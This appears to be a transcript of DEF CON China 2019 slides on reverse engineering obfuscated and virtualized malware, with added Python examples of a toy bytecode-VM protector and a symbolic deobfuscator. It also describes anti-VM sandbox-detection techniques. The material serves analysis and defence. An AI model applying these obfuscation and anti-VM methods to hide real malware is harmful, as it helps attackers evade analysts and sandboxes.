even write a loader to load the MBR structure and analyze it in IDA Pro.
Unfortunately, there are packers and protectors such as VMProtect, Themida, Arxan
and Agile .NET that use modern obfuscation techniques, making the procedure
of reversing code very complicated.
10. DEF CON CHINA 1.0 (2019) 10
Most protectors have been used with 64-bit code (and malware).
Original IAT is removed from the original code (as usually applied by any
packer). However, IAT from packers like Themida keeps only one function
(TlsSetValue).
Almost all of them provide string encryption.
They protect and check the memory integrity. Thus, it is not possible to
dump a clean executable from the memory (using Volatility, for example)
because original instructions are not decoded in the memory.
Instructions (x86/x64 code) are virtualized and transformed into virtual
machine instructions (RISC instructions).
.NET protectors rename classes, methods, fields and external references.
11. DEF CON CHINA 1.0 (2019) 11
Some packers can use instruction encryption in memory as an additional
memory layer.
Obfuscation is stack based, so it is hard to handle virtualized code statically.
Virtualized code is polymorphic, so there are many representations
referring to the same CPU instruction.
There are also fake push instructions.
There is a lot of dead and useless code.
There is some code reordering using unconditional jumps.
All obfuscators use code flattening.
Packers have a few anti-debugger and anti-VM tricks. However, a few months
ago, I saw a not so common anti-virtual machine trick based on
temperature (more about it later).
12. DEF CON CHINA 1.0 (2019) 12
Diagram: the native call int defcon(int x) is replaced by vm_call_1(opcodes, x). The "Virtualizer" turns the function into bytecodes, and the VM fetches bytes, decodes them to instructions and dispatches them to handlers.
Protectors using virtual machines introduce into the obfuscated code:
A context switch component, which "transfers" register and flag information into the VM
context (virtual machine). The opposite movement, from the VM context back to the
native (x86/x64) context, is done later (suitable to keep within C structures during the
unpacking process).
This "transformation" from native registers to virtualized registers can be one to one,
but not always.
Inside the virtual machine, the cycle is:
fetch the instruction
decode it
find the pointer to the instruction and look up the associated opcode in a handler table
call the target handler
13. DEF CON CHINA 1.0 (2019) 13
A few interesting concepts:
Fetching: the instruction to be executed by the Virtual Machine is fetched.
Decoding: the target x86 instruction is decoded using rules from the Virtual Machine
(remember: the architecture is usually based on RISC instructions).
Dispatcher: once the handler is determined, jump to the suitable handler. Dispatchers
could be made by a jump table or a switch-case structure.
Handler: in a nutshell, a handler is the implementation of the Virtual Machine
instruction set.
14. DEF CON CHINA 1.0 (2019) 14
Diagram: the instruction decoder reads opcodes from a custom instruction set and the dispatcher routes each one to a handler (A, B, C, ... such as handler_add, handler_sub, handler_push...). Stages: initialization (RVA -> RVA + process base address and other tasks), fetch, decode. Instructions are stored in an encrypted format.
15. DEF CON CHINA 1.0 (2019) 15
Diagram: each opcode (1..7) selects its handler (1..7) through a function pointer table (likely encrypted). The encrypted instructions encr_1, encr_2, ..., encr_n are indexed 1..n, and recovering and decrypting functions turn them into the decrypted instructions vm_add, vm_sub, vm_xor, vm_push, vm_pop, ..., vm_n.
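A model of the fetch/decode/dispatch cycle and the encrypted instruction stream described on these slides, as an added example (my own Python, not code from the talk or from any real protector): the toy instruction set, the rolling XOR key, the opcode aliases and the defcon() bytecode are all constructed.

```python
"""Toy model of the virtualizer on slides 12-15: int defcon(int x) becomes
vm_call_1(opcodes, x), whose loop fetches one encrypted byte at a time, decodes
it, looks the opcode up in the handler table and calls the handler, which works
on a VM context instead of the native registers.  Added example: not code from
the talk or from any real protector.  The instruction set, the rolling XOR key,
the opcode aliases and the defcon() bytecode are all constructed."""
import struct

KEY = 0x5A            # constructed initial key of the encrypted bytecode stream
MASK = 0xFFFFFFFF


class VMContext:
    """VM-side state: virtual registers, operand stack, program counter and the
    rolling key.  Bytes are decrypted only as they execute, so a memory dump
    still holds the encrypted form (the dump is useless without the VM)."""
    def __init__(self, code, native_regs):
        self.code, self.pc, self.key, self.running = code, 0, KEY, True
        self.vregs = list(native_regs)   # context switch in: native -> VM registers
        self.stack = []

    def fetch(self):
        """Fetch and decrypt one byte; the key evolves with the plaintext."""
        plain = self.code[self.pc] ^ self.key
        self.key = (self.key + plain) & 0xFF
        self.pc += 1
        return plain


def encrypt_stream(plain):
    """Inverse of VMContext.fetch: builds the opcodes blob from plain bytecode."""
    key, out = KEY, bytearray()
    for b in plain:
        out.append(b ^ key)
        key = (key + b) & 0xFF
    return bytes(out)


# Handlers: the implementation of the custom, stack-based instruction set.
def vm_push_imm(ctx):   # operand: 4-byte little-endian immediate
    ctx.stack.append(struct.unpack("<I", bytes(ctx.fetch() for _ in range(4)))[0])

def vm_push_reg(ctx):   # operand: virtual register index
    ctx.stack.append(ctx.vregs[ctx.fetch()])

def vm_pop_reg(ctx):
    ctx.vregs[ctx.fetch()] = ctx.stack.pop()

def vm_add(ctx):
    b, a = ctx.stack.pop(), ctx.stack.pop()
    ctx.stack.append((a + b) & MASK)

def vm_sub(ctx):
    b, a = ctx.stack.pop(), ctx.stack.pop()
    ctx.stack.append((a - b) & MASK)

def vm_xor(ctx):
    b, a = ctx.stack.pop(), ctx.stack.pop()
    ctx.stack.append(a ^ b)

def vm_ret(ctx):
    ctx.running = False

# Function pointer table.  Several opcodes alias one handler: virtualized code
# is polymorphic, many bytecode representations refer to the same instruction.
HANDLERS = {0x10: vm_push_imm, 0x11: vm_push_reg, 0x12: vm_pop_reg,
            0x20: vm_add, 0x21: vm_add, 0x30: vm_sub, 0x31: vm_sub,
            0x40: vm_xor, 0x41: vm_xor, 0xFF: vm_ret}


def vm_call_1(opcodes, x):
    """Dispatcher loop: fetch, decode, look the handler up, call it."""
    ctx = VMContext(opcodes, [x & MASK, 0, 0, 0])
    while ctx.running:
        opcode = ctx.fetch()                   # fetch + decode
        handler = HANDLERS.get(opcode)         # lookup in the handler table
        if handler is None:
            raise ValueError("bad opcode 0x%02X at offset %d" % (opcode, ctx.pc - 1))
        handler(ctx)                           # dispatch
    return ctx.vregs[0]                        # context switch out: VM reg 0 -> eax


def defcon(x):
    """The native function that the sample bytecode virtualizes (constructed)."""
    return (((x & MASK) ^ 0x5555) + 0x29) & MASK


# Plain bytecode for defcon(): push_reg v0; push_imm 0x5555; xor (alias 0x41);
# push_imm 0x29; add (alias 0x21); pop_reg v0; ret.  Stored only in encrypted form.
DEFCON_PLAIN = (bytes([0x11, 0x00, 0x10]) + struct.pack("<I", 0x5555)
                + bytes([0x41, 0x10]) + struct.pack("<I", 0x29)
                + bytes([0x21, 0x12, 0x00, 0xFF]))
DEFCON_OPCODES = encrypt_stream(DEFCON_PLAIN)
```

Running vm_call_1(DEFCON_OPCODES, x) gives the same result as defcon(x), while the first stored byte (0x4B) is not even a valid opcode, which is why a static look at the dumped stream does not reveal the handlers in use.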
16. DEF CON CHINA 1.0 (2019) 16
Constant unfolding: technique used by obfuscators to replace a constant by
a bunch of code that produces the same resulting constant value.
Pattern-based obfuscation: exchange of one instruction by a set of
equivalent instructions.
Abusing inline functions.
Anti-VM techniques: prevent the malware sample from running inside a VM.
Dead (garbage) code: this technique is implemented by inserting code
whose results will be overwritten in the next lines of code or, worse,
won't be used anymore.
Code duplication: different paths coming into the same destination (used
by virtualization obfuscators).
17. DEF CON CHINA 1.0 (2019) 17
Control indirection 1: call instruction -> stack pointer update -> return, skipping some
junk code after the call instruction (RET x).
Control indirection 2: the malware triggers an exception -> the registered exception
handler is called -> new branch of instructions.
Opaque predicate: although apparently there is an evaluation (conditional jump:
jz/jnz), the result always evaluates to true (or false), which means an unconditional
jump. Thus, there is a dead branch.
Anti-debugging: used as an irritating technique to slow down the analysis process.
Polymorphism: produced by self-modifying code (like shellcode) and by encrypting
resources (as most malware samples do).
18. DEF CON CHINA 1.0 (2019) 18
It is quick to create a simple IDA Pro plugin. Download the IDA SDK from
https://www.hex-rays.com/products/ida/support/download.shtml (likely, you will
need a professional account). Copy it to a folder (idasdk695/) within the IDA Pro
installation directory.
Create a project in Visual Studio 2017 (File -> New -> Project -> Visual C++ ->
Windows Desktop -> Dynamic-Link Library (DLL)).
Change a few project properties as shown in this slide and the next ones.
19. DEF CON CHINA 1.0 (2019) 19
Add "__NT__;__IDP__" to Preprocessor Definitions and change Runtime
Library to "Multi-threaded" (/MT) (take care: it is NOT /MTd).
20. DEF CON CHINA 1.0 (2019) 20
Add ida.lib (from C:\Program Files (x86)\IDA 6.95\idasdk695\lib\x86_win_vc_32)
to Additional Dependencies and its folder to Additional Library Directories.
Add "/EXPORT:PLUGIN" to Additional Options.
21. DEF CON CHINA 1.0 (2019) 21
Don’t forget necessary headers.
Initialization function.
Make the plugin available to this idb and keep the plugin
loaded in memory.
Clean-up tasks.
Function to be called when user activates the plugin.
Simple (and incomplete) URL regex.
22. DEF CON CHINA 1.0 (2019) 22
The plugin is activated by the key combination ALT-X.
Plugin structure.
The core logic is just this: it checks whether the string matches the URL regex.
If it matches, then ea == strinfo.ea.
It gets the number of strings from the "Strings view".
It gets the string.
23. DEF CON CHINA 1.0 (2019) 23
URLs found within this malicious driver.
ALT + X
24. DEF CON CHINA 1.0 (2019) 24
IDA processor modules continue being one of the best approaches to handle virtualized
packers. Please remember a few important points (as mentioned by Ilfak from Hex-Rays)
about how to write an IDA processor module:
Write an analyser: decodes instructions and fills structures with the result (ana.cpp).
Modify (or write) an emulator: processes the commands decoded by the analyser, creates
cross-references and tracks the register content (emu.cpp).
Write an outputter: writes the handled output containing prefix, comments and xrefs
(out.cpp).
The IDA Pro SDK documentation and samples are always great.
25. DEF CON CHINA 1.0 (2019) 25
#include <stdio.h>
int main (void)
{
int aborges = 0;
while (aborges < 30)
{
printf("%d\n", aborges);
aborges++;
}
return 0;
}
Control flow diagram of the original program: loading libs -> aborges = 0 -> aborges < 30 -> printf( ) -> aborges++ -> back to the comparison; when the loop ends, return 0.
26. DEF CON CHINA 1.0 (2019) 26
Original Program
27. DEF CON CHINA 1.0 (2019) 27
Flattened control flow diagram: after loading libs, cc = 1 and a loop runs while (cc != 0) around switch(cc); case 1: aborges = 0; cc = 2; break; case 2: if aborges < 30 then cc = 3 else cc = 0; break; case 3: printf; aborges++; cc = 2; break.
Disadvantages:
Loss of performance
Easy to identify the CFG flattening
28. DEF CON CHINA 1.0 (2019) 28
The obfuscator-llvm is an excellent project to be used for code obfuscation. To
install it, it is recommended to add a swap file first (because of the linking stage):
fallocate -l 8GB /swapfile
chmod 600 /swapfile
mkswap /swapfile
swapon /swapfile
swapon --show
apt-get install llvm-4.0
apt-get install gcc-multilib   (gcc library support for 32-bit builds)
git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git
mkdir build ; cd build/
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_INCLUDE_TESTS=OFF ../obfuscator/
make -j7
Possible usages:
./build/bin/clang alexborges.c -o alexborges -mllvm -fla
./build/bin/clang alexborges.c -m32 -o alexborges -mllvm -fla
./build/bin/clang alexborges.c -o alexborges -mllvm -fla -mllvm -sub
29. DEF CON CHINA 1.0 (2019) 29
Main dispatcher
Prologue and
initial assignment
30. DEF CON CHINA 1.0 (2019) 30
Main blocks
from the
program
31. DEF CON CHINA 1.0 (2019) 31
General overview
of the obfuscated code
32. DEF CON CHINA 1.0 (2019) 32
33. DEF CON CHINA 1.0 (2019) 33
.text:00401000 loc_401000: ; CODE XREF: _main+Fp
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 xor eax, eax
.text:00401005 jz short near ptr loc_40100D+1
.text:00401007 jnz near ptr loc_40100D+4
.text:0040100D
.text:0040100D loc_40100D: ; CODE XREF: .text:00401005j
.text:0040100D ; .text:00401007j
.text:0040100D jmp near ptr 0D0A8837h
Simple opaque predicate and anti-disassembly technique
34. DEF CON CHINA 1.0 (2019) 34
Decrypted
shellcode
Decryption
instructions
35. DEF CON CHINA 1.0 (2019) 35
00401040 call $+5
00401045 pop ecx
00401046 inc ecx
00401047 inc ecx
00401048 add ecx, 4
00401049 add ecx, 4
0040104A push ecx
0040104B ret
0040104C sub ecx, 6
0040104D dec ecx
0040104E dec ecx
0040104F jmp 0x401320
Call stack manipulation: do you know what's happening here?
37. DEF CON CHINA 1.0 (2019) 37
Stage 1:
add eax, ecx
Stage 2:
sub eax, B9
add eax, ecx
add eax, B9
Stage 3:
sub eax, B9
sub eax, 86
add eax, ecx
add eax, 86
push edx
mov edx, 42
inc edx
dec edx
add edx, 77
add eax, edx
pop edx
Stage 4:
push ebx
mov ebx, B9
sub eax, ebx
pop ebx
sub eax, 55
sub eax, 32
add eax, ecx
add eax, 50
add eax, 37
push edx
push ecx
mov ecx, 49
mov edx, ecx
pop ecx
inc edx
add edx, 70
dec edx
add eax, edx
pop edx
How to reverse the obfuscation and, from stage 4, return to stage 1?
38. DEF CON CHINA 1.0 (2019) 38
METASM works as a disassembler, assembler, debugger, compiler and linker.
Key features:
Written in Ruby
C compiler and decompiler
Automatic backtracking
Live process manipulation
Supports the following architectures:
Intel IA32 (16/32/64 bits)
PPC
MIPS
Supports the following file formats:
MZ and PE/COFF
ELF
Mach-O
Raw (shellcode)
root@kali:~/programs# git clone https://github.com/jjyg/metasm.git
root@kali:~/programs# cd metasm/
root@kali:~/programs/metasm# make
root@kali:~/programs/metasm# make all
Include the following line in the .bashrc file to indicate the Metasm installation directory:
export RUBYLIB=$RUBYLIB:~/programs/metasm
39. DEF CON CHINA 1.0 (2019) 39
This instruction was inserted to make the
eax register evaluation easier.
based on metasm.rb file
and Bruce Dang code.
40. DEF CON CHINA 1.0 (2019) 40
initialize and disassemble
code since beginning (start).
list the assembly code.
determines which is the final
instruction to walk back from there.
initialize the backtracking engine.
41. DEF CON CHINA 1.0 (2019) 41
Backtracking from the last instruction.
Show only the effective instructions,
which really can alter the final result.
logs the sequence of
backtracked instructions.
42. DEF CON CHINA 1.0 (2019) 42
Remember: this is our obfuscated code.
43. DEF CON CHINA 1.0 (2019) 43
44. DEF CON CHINA 1.0 (2019) 44
Game over.
45. DEF CON CHINA 1.0 (2019) 45
Output originated from backtracing_log.select
command (in reverse)
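The obfuscated "add eax, ecx" stages from the "How to reverse the obfuscation" slide and the METASM backtracking shown above, worked as an added example (my own Python, not code from the talk or from METASM): a symbolic evaluator folds the constants of the 19-instruction sequence that starts with push ebx back to eax = eax0 + ecx0, and a backward slice keeps only the instructions that can alter eax, as backtracking does. The x86 subset modelled and the helper names are assumptions.

```python
"""Symbolic simplifier and backward slice for the obfuscated "add eax, ecx"
listings on the slides (constant unfolding / pattern-based obfuscation).
Added example: not code from the talk, from METASM or from any protector.
Models only the x86 subset on the slide: mov/add/sub/inc/dec/push/pop on
32-bit registers with hex immediates.  Helper names are my own."""

# Listings copied from the slide: the 3-instruction stage and the 19-instruction
# stage (its most obfuscated one); both are semantically "add eax, ecx".
STAGE2 = "sub eax, B9; add eax, ecx; add eax, B9"
STAGE4 = ("push ebx; mov ebx, B9; sub eax, ebx; pop ebx; sub eax, 55; sub eax, 32; "
          "add eax, ecx; add eax, 50; add eax, 37; push edx; push ecx; mov ecx, 49; "
          "mov edx, ecx; pop ecx; inc edx; add edx, 70; dec edx; add eax, edx; pop edx")
REGS = ("eax", "ebx", "ecx", "edx")


def parse(listing):
    """Split 'mnem op1, op2' items (separated by ';' or newlines) into tuples."""
    insns = []
    for line in listing.replace(";", "\n").splitlines():
        if line.strip():
            mnem, _, rest = line.strip().partition(" ")
            insns.append((mnem, [o.strip() for o in rest.split(",")] if rest else []))
    return insns


class Lin:
    """Linear expression: 32-bit constant + sum(coeff * initial register value)."""
    def __init__(self, const=0, terms=None):
        self.const = const & 0xFFFFFFFF
        self.terms = {k: v for k, v in (terms or {}).items() if v}

    def combine(self, other, sign):
        terms = dict(self.terms)
        for k, v in other.terms.items():
            terms[k] = terms.get(k, 0) + sign * v
        return Lin(self.const + sign * other.const, terms)

    def __str__(self):
        parts = [k if v == 1 else "%d*%s" % (v, k) for k, v in sorted(self.terms.items())]
        if self.const or not parts:
            parts.append("0x%X" % self.const)
        return " + ".join(parts)


def symbolic_eval(listing):
    """Run the listing over symbolic registers (eax0, ebx0, ... are the inputs)
    and return the final state; constants fold away, only the dataflow remains."""
    state = {r: Lin(0, {r + "0": 1}) for r in REGS}
    stack = []
    src = lambda op: state[op] if op in REGS else Lin(int(op, 16))
    for mnem, ops in parse(listing):
        if mnem == "mov":
            state[ops[0]] = src(ops[1])
        elif mnem in ("add", "sub"):
            state[ops[0]] = state[ops[0]].combine(src(ops[1]), 1 if mnem == "add" else -1)
        elif mnem in ("inc", "dec"):
            state[ops[0]] = state[ops[0]].combine(Lin(1), 1 if mnem == "inc" else -1)
        elif mnem == "push":
            stack.append(state[ops[0]])
        elif mnem == "pop":
            state[ops[0]] = stack.pop()
        else:
            raise ValueError("unsupported mnemonic: " + mnem)
    return state


def backtrack(listing, target="eax"):
    """Backward data-dependence slice in the spirit of METASM's backtracking:
    keep only the instructions that can influence the final value of target."""
    insns = parse(listing)
    slot, pending = [], []                  # pair each pop with its push (LIFO)
    for mnem, ops in insns:
        if mnem == "push":
            pending.append("slot%d" % len(slot))
        slot.append(pending[-1] if mnem == "push" else pending.pop() if mnem == "pop" else None)
    live, keep = {target}, []
    for idx in range(len(insns) - 1, -1, -1):
        mnem, ops = insns[idx]
        if mnem == "push":
            defs, uses = {slot[idx]}, {ops[0]}
        elif mnem == "pop":
            defs, uses = {ops[0]}, {slot[idx]}
        elif mnem == "mov":
            defs, uses = {ops[0]}, {o for o in ops[1:] if o in REGS}
        else:  # add/sub/inc/dec read and write their first operand
            defs, uses = {ops[0]}, {o for o in ops if o in REGS}
        if defs & live:                     # this instruction feeds the target
            keep.append(idx)
            live = (live - defs) | uses
    return [insns[i] for i in reversed(keep)]


if __name__ == "__main__":
    for reg, value in symbolic_eval(STAGE4).items():
        print("%s = %s" % (reg, value))          # eax = eax0 + ecx0, others restored
    print("instructions that matter for eax:")
    for mnem, ops in backtrack(STAGE4):
        print("  %s %s" % (mnem, ", ".join(ops)))
```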
46. DEF CON CHINA 1.0 (2019) 46
Emulation is always an excellent method to solve practical reverse engineering problems
and, fortunately, we have uEmu and could also use the Keystone Engine assembler and the
Capstone Engine disassembler.
Keystone Engine acts as an assembler and:
Supports x86, Mips, Arm and many other architectures.
It is implemented in C/C++ and has bindings to Python, Ruby, Powershell and C#
(among other languages).
Installing Keystone:
root@kali:~/Desktop# wget https://github.com/keystone-engine/keystone/archive/0.9.1.tar.gz
root@kali:~/programs# cp /root/Desktop/keystone-0.9.1.tar.gz .
root@kali:~/programs# tar -zxvf keystone-0.9.1.tar.gz
root@kali:~/programs/keystone-0.9.1# apt-get install cmake
root@kali:~/programs/keystone-0.9.1# mkdir build ; cd build
root@kali:~/programs/keystone-0.9.1/build# apt-get install time
root@kali:~/programs/keystone-0.9.1/build# ../make-share.sh
root@kali:~/programs/keystone-0.9.1/build# make install
root@kali:~/programs/keystone-0.9.1/build# ldconfig
root@kali:~/programs/keystone-0.9.1/build# tail -3 /root/.bashrc
export PATH=$PATH:/root/programs/phantomjs-2.1.1-linux-x86_64/bin:/usr/local/bin/kstool
export RUBYLIB=$RUBYLIB:~/programs/metasm
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
47. DEF CON CHINA 1.0 (2019) 47
Instructions from the original obfuscated code.
Creating a Keystone engine.
Assembling our instructions using the Keystone engine.
Freeing memory and closing the engine.
48. DEF CON CHINA 1.0 (2019) 48
49. DEF CON CHINA 1.0 (2019) 49
To install Capstone: apt-get install libcapstone3 libcapstone-dev
50. DEF CON CHINA 1.0 (2019) 50
Original code disassembled by Capstone.
51. DEF CON CHINA 1.0 (2019) 51
IDA Pro confirms our disassembly task.
52. DEF CON CHINA 1.0 (2019) 52
Set up before running uEmu.
This result confirms our previous conclusion.
Download uEmu from https://github.com/alexhude/uEmu
Install Unicorn: pip install unicorn.
Load uEmu in IDA using the ALT+F7 hot key.
Right-click the code and choose the uEmu sub-menu.
53. DEF CON CHINA 1.0 (2019) 53
# git clone https://github.com/unicorn-engine/unicorn.git
# cd unicorn ; ./make.sh
# ./make.sh install
54. DEF CON CHINA 1.0 (2019) 54
55. DEF CON CHINA 1.0 (2019) 55
56. DEF CON CHINA 1.0 (2019) 56
57. DEF CON CHINA 1.0 (2019) 57
58. DEF CON CHINA 1.0 (2019) 58
59. DEF CON CHINA 1.0 (2019) 59
61. DEF CON CHINA 1.0 (2019) 61
MIASM is one of the most impressive frameworks for reverse engineering; it is able to analyze, generate and modify several different types of programs.
MIASM supports assembling and disassembling programs for different platforms such as ARM, x86, MIPS and so on, and it is also able to emulate code by using a JIT.
Therefore, MIASM is excellent for de-obfuscation.
Installing MIASM:
git clone https://github.com/serpilliere/elfesteem.git elfesteem
cd elfesteem/
python setup.py build
python setup.py install
apt-get install clang texinfo texi2html
apt-get remove libtcc-dev
apt-get install llvm
cd ..
git clone http://repo.or.cz/tinycc.git
cd tinycc/
git checkout release_0_9_26
./configure --disable-static
make
make install
62. DEF CON CHINA 1.0 (2019) 62
pip install llvmlite
apt-get install z3
apt-get install python-pycparser
git clone https://github.com/cea-sec/miasm.git
root@kali:~/programs/miasm# python setup.py build
root@kali:~/programs/miasm# python setup.py install
root@kali:~/programs/miasm/test# python test_all.py
apt-get install graphviz
apt-get install xdot
(testing MIASM) root@kali:~/programs# python
/root/programs/miasm/example/disasm/full.py -m x86_32 /root/programs/shellcode
INFO : Load binary
INFO : ok
INFO : import machine...
INFO : ok
INFO : func ok 0000000000001070 (0)
INFO : generate graph file
INFO : generate intervals
[0x1070 0x10A2]
INFO : total lines 0
(testing MIASM) xdot graph_execflow.dot
63. DEF CON CHINA 1.0 (2019) 63
64. DEF CON CHINA 1.0 (2019) 64
Opens our file. The Container provides the byte source to the disasm engine.
Instantiates the disassembly engine using the x86 32-bit architecture.
Runs the recursive traversal disassembly from the beginning.
Generates a dot graph.
Sets "llvm" as the JIT engine for emulation and initializes the stack.
Sets the virtual start address, register values and memory protection.
Adds a breakpoint at the last line of code.
Runs the emulation.
65. DEF CON CHINA 1.0 (2019) 65
Disassembling our code (again)
66. DEF CON CHINA 1.0 (2019) 66
67. DEF CON CHINA 1.0 (2019) 67
Our proposed code.
68. DEF CON CHINA 1.0 (2019) 68
Get the IRA converter.
Initialize and run the Symbolic Execution Engine.
69. DEF CON CHINA 1.0 (2019) 69
70. DEF CON CHINA 1.0 (2019) 70
The same conclusion as from our previous tests.
72. DEF CON CHINA 1.0 (2019) 72
TRITON
It can be downloaded from https://triton.quarkslab.com/
Based on the Intel Pin instrumentation tool: https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool
Triton offers a C/C++/Python interface that provides:
dynamic symbolic execution
run-time register information and memory modification
taint engine
Z3 interface to handle constraints
snapshot engine (it is not necessary to restart the program every time; it only restores memory and register states)
access to Pin functions
symbolic fuzzing
gathering code coverage
Supports the x86 and x64 architectures.
73. DEF CON CHINA 1.0 (2019) 73
Triton supports:
symbolic execution mode:
emulates instruction effects.
allows us to emulate only part of the program (excellent for analyzing branches).
concolic execution mode:
allows us to analyze the program only from the start.
Taint analysis is amazing because we are able to use it in fuzzing tasks to know which registers and memory addresses are "affected" by the user's input data.
During the virtual machine's decoding, it is interesting to distinguish which instructions are related to user input and which are not.
74. DEF CON CHINA 1.0 (2019) 74
Installing Triton without Pin (Ubuntu 19):
apt-get install libboost-all-dev
apt-get install libpython-dev
apt-get install libcapstone-dev
Take care: DO NOT install libz3-dev. If this package is already installed, remove it.
git clone https://github.com/Z3Prover/z3
cd z3/
python scripts/mk_make.py
cd build/
make
make install
git clone https://github.com/JonathanSalwan/Triton.git
cd Triton/
mkdir build
cd build/
cmake ..
make -j install (my recommendation: 8 GB RAM + 8 GB swapfile)
75. DEF CON CHINA 1.0 (2019) 75
Installing Triton with Pin (Ubuntu 19):
Install the same packages from last slide.
Install Z3 as shown in the last slide.
wget https://software.intel.com/sites/landingpage/pintool/downloads/pin-2.14-71313-gcc.4.4.7-linux.tar.gz
tar zxvf pin-2.14-71313-gcc.4.4.7-linux.tar.gz
cd pin-2.14-71313-gcc.4.4.7-linux/source/tools
git clone https://github.com/JonathanSalwan/Triton.git
cd Triton/
mkdir build
cd build
cmake -DPINTOOL=on -DKERNEL4=on ..
make
cd ..
./build/triton ./src/examples/pin/ir.py /usr/bin/host (only to test the installation).
79. DEF CON CHINA 1.0 (2019) 79
This is an educational way to show how to find the hexadecimal representation of each instruction. However, there are much better ways to do it: opening the binary in IDA Pro, Radare2 or Ghidra, or even using distorm3.
94. DEF CON CHINA 1.0 (2019) 94
DTrace is a dynamic tracing framework, which is very efficient and famous on the Solaris operating system.
DTrace was initially written by Mike Shapiro, Adam Leventhal and Bryan Cantrill at Sun Microsystems. Although they had been developing DTrace since 2003, it was only introduced in Solaris 10 03/05.
It is used to get a real-time overview of a system in user and kernel mode. Furthermore, it can be used to understand how applications and systems are behaving.
A few months ago, DTrace was ported to Windows: https://github.com/opendtrace/opendtrace/tree/windows
DTrace could be summarized as a set of probes (sensors) scattered over key points in the kernel. Thus, every time a probe is "activated" (fires), it is possible to record and understand the application's behavior.
Using DTrace makes it easier to trace the profile of a process and the system, find which system calls are "called", how many bytes are written/read by a process, which files are opened by a process, trace the sequence of called system calls and so on.
95. DEF CON CHINA 1.0 (2019) 95
DTrace scripts are written in the D language (similar to awk).
Probe names are described by the following syntax:
provider:module:function:name
where:
provider: library of probes used to instrument an area of the system. On Windows, the existing providers are syscall, etw, profile, pid and dtrace.
module: kernel module where we find the probe.
function: function containing the probe.
name: specific name or description of the target probe.
Key concepts:
predicates: user-defined conditions.
actions: tasks that are run when a probe fires.
aggregations: coalesce data using aggregation functions.
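The probe-description grammar above, as an added Python example that is not part of the slides: it parses descriptions with omitted fields and glob wildcards the way dtrace(1) interprets them (missing fields are filled from the right, empty fields match anything), then selects matching probes from a constructed list; the provider set is the Windows list given on this slide plus fbt, which a later slide describes.

```python
# Added example (not from the slides): parse provider:module:function:name
# probe descriptions and match them against full probe names.
from fnmatch import fnmatchcase

FIELDS = ("provider", "module", "function", "name")
# Providers listed on the slide for Windows; fbt is added because the deck
# notes it exists once a kernel debugger is attached.
WINDOWS_PROVIDERS = {"syscall", "etw", "profile", "pid", "dtrace", "fbt"}


def parse_probe(desc):
    """Split a probe description into its four fields.

    Fewer than four fields are filled from the right, as dtrace(1) does:
    'entry' is a name, 'NtCreateFile:entry' is function:name. Empty fields
    act as wildcards and match anything.
    """
    parts = desc.split(":")
    if len(parts) > 4:
        raise ValueError(f"too many fields in probe description: {desc!r}")
    parts = [""] * (4 - len(parts)) + parts
    spec = dict(zip(FIELDS, parts))
    prov = spec["provider"]
    if prov and not any(fnmatchcase(p, prov) for p in WINDOWS_PROVIDERS):
        raise ValueError(f"unknown provider {prov!r}")
    return spec


def probe_matches(spec, probe):
    """True when every non-empty field of spec glob-matches the probe."""
    actual = dict(zip(FIELDS, probe.split(":")))
    return all(not spec[f] or fnmatchcase(actual[f], spec[f]) for f in FIELDS)


def select_probes(desc, probes):
    """Return the probes (in order) that a description would enable."""
    spec = parse_probe(desc)
    return [p for p in probes if probe_matches(spec, p)]


# Constructed probe names written in provider:module:function:name form.
SAMPLE_PROBES = [
    "syscall::NtCreateFile:entry",
    "syscall::NtCreateFile:return",
    "syscall::NtWriteFile:entry",
    "fbt:ntfs:NtfsCommonCreate:entry",
    "profile:::tick-1sec",
    "dtrace:::BEGIN",
]
```

select_probes("syscall:::entry", SAMPLE_PROBES) keeps only the two syscall entry probes, while the bare description "entry" also picks up the fbt entry probe, which is why a wide description on a busy provider needs a predicate to stay useful.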
96. DEF CON CHINA 1.0 (2019) 96
To install DTrace:
Windows 10 x64 (build 18342 or later) from the Windows Insider Program.
bcdedit.exe /set dtrace on
Download the DTrace package: http://download.microsoft.com/download/B/D/4/BD4B95A5-0B61-4D8F-837C-F889AAD8DAA2/DTrace.amd64.msi
_NT_SYMBOL_PATH=srv*C:\symbols*https://msdl.microsoft.com/download/symbols
Reboot the system.
Open a command prompt as administrator.
If you are using fbt (function boundary tracing), it is necessary to attach WinDbg and boot Windows in debug mode.
97. DEF CON CHINA 1.0 (2019) 97
98. DEF CON CHINA 1.0 (2019) 98
99. DEF CON CHINA 1.0 (2019) 99
100. DEF CON CHINA 1.0 (2019) 100
101. DEF CON CHINA 1.0 (2019) 101
102. DEF CON CHINA 1.0 (2019) 102
103. DEF CON CHINA 1.0 (2019) 103
It is possible to use a different type of provider named "fbt" (function boundary tracing), which tracks the sequence of system calls being executed through NTFS in the kernel.
The "fbt" provider is only available when there is a kernel debugger attached to Windows 10.
104. DEF CON CHINA 1.0 (2019) 104
105. DEF CON CHINA 1.0 (2019) 105
106. DEF CON CHINA 1.0 (2019) 106
Traceext.sys: exposes the functionality used by DTrace for tracing.
107. DEF CON CHINA 1.0 (2019) 107
109. DEF CON CHINA 1.0 (2019) 109
It is extremely easy to write malware samples using anti-VM techniques designed to detect VMware (checking I/O port communication), VirtualBox, Parallels, the SeaBIOS emulator, the QEMU emulator, the Bochs emulator, Hyper-V, Innotek VirtualBox and sandboxes (Cuckoo).
Furthermore, there are dozens of techniques that could be used for detecting VMware sandboxes:
Examining the registry (OpenSubKey( ) function) to try to find entries related to tools installed in the guest (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters).
Using WMI to query the Win32_BIOS management class to interact with attributes of the physical machine.
We already know every single anti-VM technique around the world, and all of them are documented.
Most current techniques use WMI, and it is quick to write a C# program using them.
110. DEF CON CHINA 1.0 (2019) 110
111. DEF CON CHINA 1.0 (2019) 111
The code from the last slide does not have anything new:
The ManagementClass class represents a Common Information Model (CIM) management class.
The Win32_BIOS WMI class represents the attributes of the BIOS; members of this class enable you to access WMI data using a specific WMI class path.
GetInstances( ) acquires a collection of all instances of the class.
GetEnumerator( ) returns the enumerator (IEnumerator) for the collection.
IEnumerator.Current returns the element at the current position.
IEnumerator.MoveNext( ) advances the enumerator to the next element of the collection.
Physical host:
C:\> Test_VM.exe
Attributes:
Version: DELL - 6222004
SerialNumber: D5965S1
OperatingSystem: 0
Manufacturer: Dell Inc.
